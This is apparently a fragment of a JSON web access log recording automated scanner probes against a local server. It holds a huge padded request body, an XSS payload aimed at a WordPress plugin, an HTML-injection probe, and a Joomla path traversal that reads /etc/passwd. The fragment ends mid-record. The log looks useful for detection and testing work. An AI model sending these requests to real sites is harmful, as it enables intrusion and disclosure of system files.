AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/admin/public/default.html HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.040","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=\x22><\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 